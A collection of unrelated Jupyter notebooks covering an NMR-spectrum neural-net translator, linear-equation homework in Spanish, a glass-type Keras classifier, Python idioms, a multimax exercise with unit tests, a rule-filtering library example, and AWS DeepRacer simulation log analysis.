upload_to_mapbox(f, os.path.splitext(os.path.basename(f))[0])
###Output
['/content/drive/My Drive/copernicus-forests/SWE-bv-spp.mbtiles']
/content/drive/My Drive/copernicus-forests/SWE-bv-spp.mbtiles
201
|
examples/TranslatorExample.ipynb | ###Markdown
SSPINN Neural Net Translator Let's take a look at our nn_translator function. This function takes the input file and parses it to get a tuple containing:1. a list of elements of size 10 concatonated with a list of peak areas and multiplicities of size 3,3402. a connectivity matrix of size 432 by 432So first we will import the nn_translator from sspinn. We also import os so that we can look at the input files:
###Code
from sspinn.nn_translator import nn_translator as nnt
import os
###Output
_____no_output_____
###Markdown
This is what the input file for C15O2H22 would look like for a training file:
###Code
fo = open('nn_translator_test.txt', 'r')
line = fo.readline()
print(line)
while line != '':
line = fo.readline()
print(line)
###Output
Empirical formula: C15O2H22
peakLocation peakArea peakMultiplicity
9.1 1 Q
10.9 1 Q
24.2 1 Q
26.6 1 q
27.4 1 T
33.0 1 t
39.0 1 T
44.1 1 S
46.2 1 D
72.7 1 d
121.6 1 D
125.6 1 S
138.1 1 s
165.9 1 s
200.1 1 S
Connectivity Matrix
C C C C C C C C C C C C C C C O O H H H H H H H H H H H H H H H H H H H H H H
0 1 0 1 0 0 0 0 0 0 0 0 0 0 0 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
1 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 1 0 0 1 0 0 0 0 0 0 0 1 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
1 0 0 0 0 2 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 1 0 0 1 0 1 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 2 1 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 1 0 0 1 0 0 0 0 0 0 0 0 1 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 1 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 1 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 1 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 1 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 1 0 0 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 1 2 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 1 1 0 0 0 0 0 0 0 0 0 0
0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 1 1 0 0 0 0 0 0 0
0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 1 1 0 0 0 0
0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 1 1 0
2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1
0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
###Markdown
The input file starts out with the empirical formula, followed by a list of the peak location, peak area, and peak multiplicity. Since we are using C-NMR, all of the peak areas should be set to 1. If the input file is not a training file, then it will end after this list. If the input file is a training file, then it will also include a connectivity matrix at the end. To run the file through the nn_traslator we use the following function which take 2 arguments:1. The path to the input file (string)2. Whether or not this is a training file (boolean default=True)
###Code
output = nnt('nn_translator_test.txt', True)
###Output
_____no_output_____
###Markdown
This function will output a tuple with two elements. We check the size of each element and make sure they are the expected sizes (3350 and 432 by 432):
###Code
len(output[0])
print(len(output[1]), 'by', len(output[1][0]))
###Output
432 by 432
###Markdown
The elements are included in the first 11 elements of `input[0]`:
###Code
output[0][0:10]
###Output
_____no_output_____
###Markdown
The rest of `input[0]` contains the multiplicities of peaks at locations that correspond with their index number (there is not a peak at 9.0 there will be a zero at `index = 90+11`, but there quartet at 9.1, so we will see a 4 at `index = 91+11` ):
###Code
output[0][90+11:110]
###Output
_____no_output_____
###Markdown
The elements of the connectivity matrix that is included in the input file are expanded into a conectivity matrix of size 432 by 432 where the first 182 rows represent the connections to hydrogens, the next 144 rows contain the carbon connections, and so on with N, O, S, F, Cl, Br, P, I, and B.Since hydrogen cannot bond with hydrogen, if we look at the first row, we will see that the first 22 elements (looking just at the columns related to the number of hydrogens in our system, for the sake of looking at a reasonably sized matrix) will be zero:
###Code
for i in range(0,22):
print(output[1][i][0:22])
###Output
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
###Markdown
We can look at the carbon hydrogen bonds by looking at the block for elements (i,j) where i runs from 0 to 22 and j runs from 183 to 198:
###Code
for i in range(0,22):
print(output[1][i][183:198])
###Output
[0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
###Markdown
However, if we look at the carbon carbon block (for the first 15 carbons, since those are the ones involved in bonding) we will see single and double bonds:
###Code
for i in range(183, 198):
print(output[1][i][183:198])
###Output
[0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0]
[1, 0, 0, 0, 0, 2, 0, 0, 0, 0, 0, 1, 0, 0, 0]
[0, 0, 1, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 1, 0]
[0, 0, 0, 2, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 2, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 1, 2, 0, 0, 0, 0, 1]
[0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0]
###Markdown
We can also see the relevent carbon oxygen bonds in the following block:
###Code
for i in range(346, 348):
print(output[1][i][183:198])
###Output
[2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
[0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
|
Tareas/Tarea #1.3_06 febrero.ipynb | ###Markdown
Robótica Industrial--Alejandro Rojas Barba Fecha de entrega: 11 de febrero del 2019Tarea 3 Ejercicio 1--La señora Mercedes fue al mercado y le ofrecieron las siguientes promociones: un paquete de 3 jabones, 2 cremas dentales y 4 cepillos de dientes, por 206; un segundo paquete de 5 jabones, 3 cremas dentales y 2 cepillos por 210; un tercer paquete contenía 6 unidades de cada uno de los anteriores artículos, por 412. ¿Cuál es el costo de cada artículo?
###Code
import numpy as np
A=np.array([ [3,2,4],
[5,3,2],
[6,6,6] ])
B=np.array([ [206],
[210],
[412] ])
C=np.linalg.inv(A)@B
print("Jabones:",float(C[0]))
print("Cepillos dentales:",float(C[1]))
print("Sal:",float(C[2]))
###Output
Jabones: 15.333333333333357
Cepillos dentales: 26.666666666666657
Sal: 26.66666666666667
###Markdown
Ejercicio 2--La señora Juana compra 3kg de frijol, 2 kg de sal y 1 kg de arroz por 130. La señora Petra compra 2 kg de frijol, 1 kg de sal y 1 kg de arroz pagando un total de 90. Otra señora compra compra 1 kg de frijol, 1 kg de sal, 1 kg de arroz pagando un total de 60. Si las tres señoras compraron en la misma tienda, ¿Cuál es el precio por kg de cada producto?
###Code
A=np.array([ [3,2,1],
[2,1,1],
[1,1,1] ])
B=np.array([ [130],
[90],
[60] ])
C=np.linalg.inv(A)@B
print("Frijol:",int(C[0]))
print("Sal:",int(C[1]))
print("Arroz:",int(C[2]))
###Output
Frijol: 30
Sal: 10
Arroz: 20
|
Neural Networks/Glass.ipynb | ###Markdown
###Code
import tensorflow as tf
import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
%matplotlib inline
print(f'Tensorflow version: {tf.__version__}')
glass_data = pd.read_csv('/content/drive/My Drive/Colab Notebooks/glass.csv', parse_dates=True, encoding = "cp1252")
glass_data.head()
glass_data.groupby('Type').count().reset_index()
glass_data['Type'].replace(to_replace={1: 0, 2: 1, 3: 2, 4: 3, 5: 4, 6: 5, 7: 6}, inplace=True)
corr = glass_data.corr(method = "pearson")
# corr = glass_data.corr(method = "spearman")
# corr = glass_data.corr(method = "kendall")
f, ax = plt.subplots(figsize=(10, 10))
sns.heatmap(corr, mask=np.zeros_like(corr, dtype=np.bool), cmap=sns.diverging_palette(220, 10, as_cmap=True), square=True, ax=ax, annot=True)
X = glass_data[['RI','Na','Mg','Al','Si','K','Ca','Ba','Fe']]
y = glass_data['Type']
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0)
from sklearn.preprocessing import StandardScaler
scaler = StandardScaler()
X_train = scaler.fit_transform(X_train)
X_test = scaler.transform(X_test)
print(X_train.shape[1])
print(y.unique())
model = tf.keras.models.Sequential([
tf.keras.layers.Dense(units=155, input_shape=(X_train.shape[1],), activation='relu'),
tf.keras.layers.Dense(units=72, activation='relu'),
tf.keras.layers.Dense(units=152, activation='relu'),
tf.keras.layers.Dense(units=52, activation='relu'),
tf.keras.layers.Dense(units=152, activation='relu'),
tf.keras.layers.Dense(units=52, activation='relu'),
tf.keras.layers.Dense(units=7, activation='softmax')
])
model.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['accuracy'])
model.summary()
cl = model.fit(X_train, y_train, validation_data=(X_test,y_test), epochs=50)
fig, ax = plt.subplots(figsize=(15,5))
plt.plot(cl.history['accuracy'], label='accuracy')
plt.plot(cl.history['val_accuracy'], label='val_accuracy', linestyle='--')
plt.plot(cl.history['loss'], label='loss')
plt.plot(cl.history['val_loss'], label='val_loss', linestyle='--')
plt.legend()
y_pred = model.predict(X_test)
y_test_list=list(y_test)
total=len(y_test_list)
correct=0
# for i in range(len(y_test_list)):
# print(f'{i+1} - {y_pred[4][i]:.3f} - {y_test_list[4]}')
# if np.argmax(y_pred[i])+1==y_test_list[i]:
# print(f'{i+1} - {np.argmax(y_pred[i])} - {y_test_list[i]}')
for i in range(total):
# print(f'{np.argmax(y_pred[i])} - {np.amax(y_pred[i])} - {y_test_list[i]}')
if(np.argmax(y_pred[i])==y_test_list[i]):
correct+=1
print(f'{correct}/{total}')
print(correct/total)
p_test = model.predict(X_test).argmax(axis=1)
cm = tf.math.confusion_matrix(y_test, p_test)
f, ax = plt.subplots(figsize=(7, 5))
sns.heatmap(cm, annot=True, cmap='Blues', square=True, linewidths=0.01, linecolor='grey')
plt.title('Confustion matrix')
plt.ylabel('True label')
plt.xlabel('Predicted label')
###Output
_____no_output_____ |
.ipynb_checkpoints/view_pairs-checkpoint.ipynb | ###Markdown
Todos based on today's observations1. Detect when there is an implicit multiplication?2. avoid situations like 1,…,n−1.3. Potentially get rid of fractions?4. split on hspace, vspace, \\\\ (EQDS31476149Q)5. get rid of text6. add a tf-idf post-pass7. add comma, semicolor split operator8. Detect series?
###Code
katex('\\vec{\\xi}')
katex('\\xi')
###Output
_____no_output_____ |
Python/Python Morsels/multimax/my_try/multimax.ipynb | ###Markdown
Bonus1: Make sure the function returns an empty list if the iterable is empty
###Code
multimax([])
###Output
_____no_output_____
###Markdown
Bonus2: Make sure the function works well with iterator such as files, generators etc
###Code
numbers = [1, 3, 8, 5, 4, 10, 6]
odds = (n for n in numbers if n % 2 == 1)
multimax(odds)
###Output
_____no_output_____
###Markdown
Bonus3: The multimax function accept a keyword argument called "key" that is a function which will be used to determine the key by which to compare values as maximums. For example the key function could be used to find the longest words in a list of words
###Code
words = ["cheese", "shop", "ministry", "of", "silly", "walks", "argument", "clinic"]
multimax(words, key=len)
words = ["cheese", "shop", "ministry", "of", "silly", "walks", "argument", "clinic"]
max(words, key=len)
words = ["cheese", "shop", "argument", "of", "silly", "walks", "ministry", "clinic"]
max(words, key=len)
###Output
_____no_output_____
###Markdown
Unitests
###Code
import unittest
class MultiMaxTests(unittest.TestCase):
"""Tests for multimax."""
def test_single_max(self):
self.assertEqual(multimax([1, 2, 4, 3]), [4])
def test_two_max(self):
self.assertEqual(multimax([1, 4, 2, 4, 3]), [4, 4])
def test_all_max(self):
self.assertEqual(multimax([1, 1, 1, 1, 1]), [1, 1, 1, 1, 1])
def test_lists(self):
inputs = [[0], [1], [], [0, 1], [1]]
expected = [[1], [1]]
self.assertEqual(multimax(inputs), expected)
def test_order_maintained(self):
inputs = [
(3, 2),
(2, 1),
(3, 2),
(2, 0),
(3, 2),
]
expected = [
inputs[0],
inputs[2],
inputs[4],
]
outputs = multimax(inputs)
self.assertEqual(outputs, expected)
self.assertIs(outputs[0], expected[0])
self.assertIs(outputs[1], expected[1])
self.assertIs(outputs[2], expected[2])
# To test the Bonus part of this exercise, comment out the following line
# @unittest.expectedFailure
def test_empty(self):
self.assertEqual(multimax([]), [])
# To test the Bonus part of this exercise, comment out the following line
# @unittest.expectedFailure
def test_iterator(self):
numbers = [1, 4, 2, 4, 3]
squares = (n**2 for n in numbers)
self.assertEqual(multimax(squares), [16, 16])
# To test the Bonus part of this exercise, comment out the following line
# @unittest.expectedFailure
def test_key_function(self):
words = ["alligator", "animal", "apple", "artichoke", "avalanche"]
outputs = ["alligator", "artichoke", "avalanche"]
self.assertEqual(multimax(words, key=len), outputs)
if __name__ == "__main__":
unittest.main(argv=['first-arg-is-ignored'], exit=False)
###Output
........
----------------------------------------------------------------------
Ran 8 tests in 0.004s
OK
|
iguanas/rule_selection/examples/simple_filter_example.ipynb | ###Markdown
Simple Filter Example The SimpleFilter class is used to filter out low performing rules from a set. Requirements To run, you'll need the following:* A rule set (specifically the binary columns of the rules as applied to a dataset). ---- Import packages
###Code
from iguanas.rule_selection import SimpleFilter
from iguanas.metrics.classification import FScore
import pandas as pd
###Output
_____no_output_____
###Markdown
Read in data Let's read in some dummy rules (stored as binary columns) and the target column.
###Code
X_rules_train = pd.read_csv(
'dummy_data/X_rules_train.csv',
index_col='eid'
)
y_train = pd.read_csv(
'dummy_data/y_train.csv',
index_col='eid'
).squeeze()
X_rules_test = pd.read_csv(
'dummy_data/X_rules_test.csv',
index_col='eid'
)
y_test = pd.read_csv(
'dummy_data//y_test.csv',
index_col='eid'
).squeeze()
X_rules_train.columns.tolist()
###Output
_____no_output_____
###Markdown
---- Filter rules based on performance metrics Set up class parameters Now we can set our class parameters for the `SimpleFilter` class. You need to provide the metric you want to filter by, as well as the threshold value and type of operator. Here, we'll be filtering out rules with an F1 score < 0.46. To filter on F1 score, we'll use the `FScore` class from the `metrics` module.**Please see the class docstring for more information on each parameter.**
###Code
f1 = FScore(beta=1)
params = {
'threshold': 0.46,
'operator': '>=',
'metric': f1.fit
}
###Output
_____no_output_____
###Markdown
Instantiate class and run fit method Once the parameters have been set, we can run the `fit` method to calculate which rules should be kept.
###Code
fr = SimpleFilter(**params)
fr.fit(
X_rules=X_rules_train,
y=y_train
)
###Output
_____no_output_____
###Markdown
Outputs The `fit` method does not return anything. See the `Attributes` section in the class docstring for a description of each attribute generated:
###Code
fr.rules_to_keep
###Output
_____no_output_____
###Markdown
---- Drop filtered rules from another dataset Use the `transform` method to drop the filtered rules from a given dataset.
###Code
X_rules_test_filtered = fr.transform(X_rules=X_rules_test)
###Output
_____no_output_____
###Markdown
Outputs The `transform` method returns a dataframe with the filtered rules dropped:
###Code
X_rules_test_filtered.head()
###Output
_____no_output_____
###Markdown
---- Calculate filtered rules and drop them from a dataset (in one step) You can also use the `fit_transform` method to calculate the filtered rules and drop them from the training set.
###Code
X_rules_train_filtered = fr.fit_transform(
X_rules=X_rules_train,
y=y_train
)
###Output
_____no_output_____
###Markdown
Outputs The `fit_transform` method returns a dataframe with the filtered rules dropped:
###Code
fr.rules_to_keep
X_rules_train_filtered.head()
###Output
_____no_output_____ |
dialectal segmenter/Transforming Code into Beautiful, Idiomatic Python.ipynb | ###Markdown
Grouping with dectionaries
###Code
names = ['Mohamed', 'disooqi', 'Asmaa', 'Mariam', 'Fatema']
d={}
for name in names:
key = len(name)
if key not in d:
d[key] = []
d[key].append(name)
d
from collections import defaultdict
d = defaultdict(list)
for name in names:
key = len(name)
d[key].append(name)
d
# from collections import ChainMap
from __future__ import ChainMap
d = ChainMap(c, b)
from collections import namedtuple
dos = namedtuple('disooqi', ['married','kids','job'])
dos(4,2,1)
###Output
_____no_output_____ |
log-analysis/DeepRacer Log Analysis.ipynb | ###Markdown
Simulation Run Log Analysis and Visualization for AWS DeepRacerThis notebook walks through how you can analyze and debug using the AWS DeepRacer Simulation logs ```1. Tools to find best iteration of your model2. Visualize reward distribution on the track 2.1 Visualize reward heatmap per episode or iteration3. Identify hotspots on the track for your model4. Understand probability distributions on simulated images5. Evaluation run analysis - plot lap speed heatmap``` Requirementsboto3 >= 1.9.133 ; configure your aws cli and/or boto credentials fileAWS CLI: https://docs.aws.amazon.com/cli/latest/userguide/cli-chap-configure.htmlBoto Configuration: https://boto3.amazonaws.com/v1/documentation/api/latest/guide/configuration.html
###Code
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from datetime import datetime
%matplotlib inline
#Shapely Library
from shapely.geometry import Point, Polygon
from shapely.geometry.polygon import LinearRing, LineString
from log_analysis import *
import cw_utils
# Make sure your boto version is >= '1.9.133'
cw_utils.boto3.__version__
#print log files and show most recent. You may want to use that file for analysis
import os
file_list = []
for file in os.listdir("logs"):
if(file=="latest"):
continue
file_list.append([os.stat(os.path.join("logs", file)).st_mtime, os.path.join("logs", file)])
file_list.sort(key=lambda x: x[0]) # sort by creation date
print(file + " : " + str(os.stat(os.path.join("logs", file)).st_mtime))
print("\nMost recent file = " + file_list[-1][1])
fname = file_list[-1][1]
###Output
deepracer-fe179db0-c1f3-11e9-8c5c-0242ac120004.log : 1566166485.1706324
c02f1706-c13c-11e9-8ad0-0242ac120004 : 1566080238.9316764
deepracer-5bf07a28-c1ff-11e9-ae47-0242ac120004.log : 1566166072.0296586
deepracer-Oval_track.log : 1566167056.440198
deepracer-Oval_Track.log : 1566178685.2514682
log : 1566862739.0616481
deepracer-sim-2zfqgg08b2bl.log : 1566260306.61707
deepracer-sim-sample.log : 1566167020.652166
deepracer-dr-sm-rltj--20190819134949-f350b748-9893-4350-8d32-3869ab5038e3.log : 1566261861.6997128
deepracer-6ebf6bca-c13f-11e9-bd3a-0242ac120004.log : 1566166471.5945964
deepracer-sim-j5gdq7sxh2c2.log : 1566261926.8624902
Most recent file = logs/log
###Markdown
Download the desired log file given the simulation ID If you wish to bulk export the logs from Amazon Cloudwatch to Amazon S3 :: https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/S3ExportTasks.html
###Code
#stream_name = 'sim-2zfqgg08b2bl' ## CHANGE This to your simulation application ID
stream_name = 'sim-j5gdq7sxh2c2' #training 5 min
fname = 'logs/deepracer-%s.log' %stream_name
cw_utils.download_log(fname, stream_prefix=stream_name)
!tail -n 3 $fname
###Output
SIM_TRACE_LOG:20,55,3.9585,0.6759,-0.0161,-0.26,0.50,2,1.0000,False,True,5.9333,4,17.67,1566223048.2305052
SIM_TRACE_LOG:20,56,3.9712,0.6751,-0.0155,-0.52,1.00,1,1.0000,False,True,6.0052,4,17.67,1566223048.2976956
SIM_TRACE_LOG:20,57,3.9911,0.6734,-0.0246,0.00,1.00,5,1.0000,False,True,6.1177,4,17.67,1566223048.3647573
###Markdown
Load waypoints for the track you want to run analysis on```Tracks Available::AWS_track Straight_track Oval_trackBowtie_track H_track reinvent_base```
###Code
def get_track_waypoints(track_name):
return np.load("tracks/%s.npy" % track_name)
waypoints = get_track_waypoints("reinvent_base") ### re:invent track
waypoints.shape
###Output
_____no_output_____
###Markdown
Visualize the Track and Waypoints
###Code
l_center_line = LineString(waypoints[:,0:2])
l_inner_border = LineString(waypoints[:,2:4])
l_outer_border = LineString(waypoints[:,4:6])
road_poly = Polygon(np.vstack((l_outer_border, np.flipud(l_inner_border))))
road_poly
# rescale waypoints to centimeter scale
center_line = waypoints[:,0:2] *100
inner_border = waypoints[:,2:4] *100
outer_border = waypoints[:,4:6] *100
###Output
_____no_output_____
###Markdown
Helper Functions
###Code
def plot_track(df, track_size=(500, 800), x_offset=0, y_offset=0):
'''
Each track may have a diff track size,
For reinvent track, use track_size=(500, 800)
Tokyo, track_size=(700, 1000)
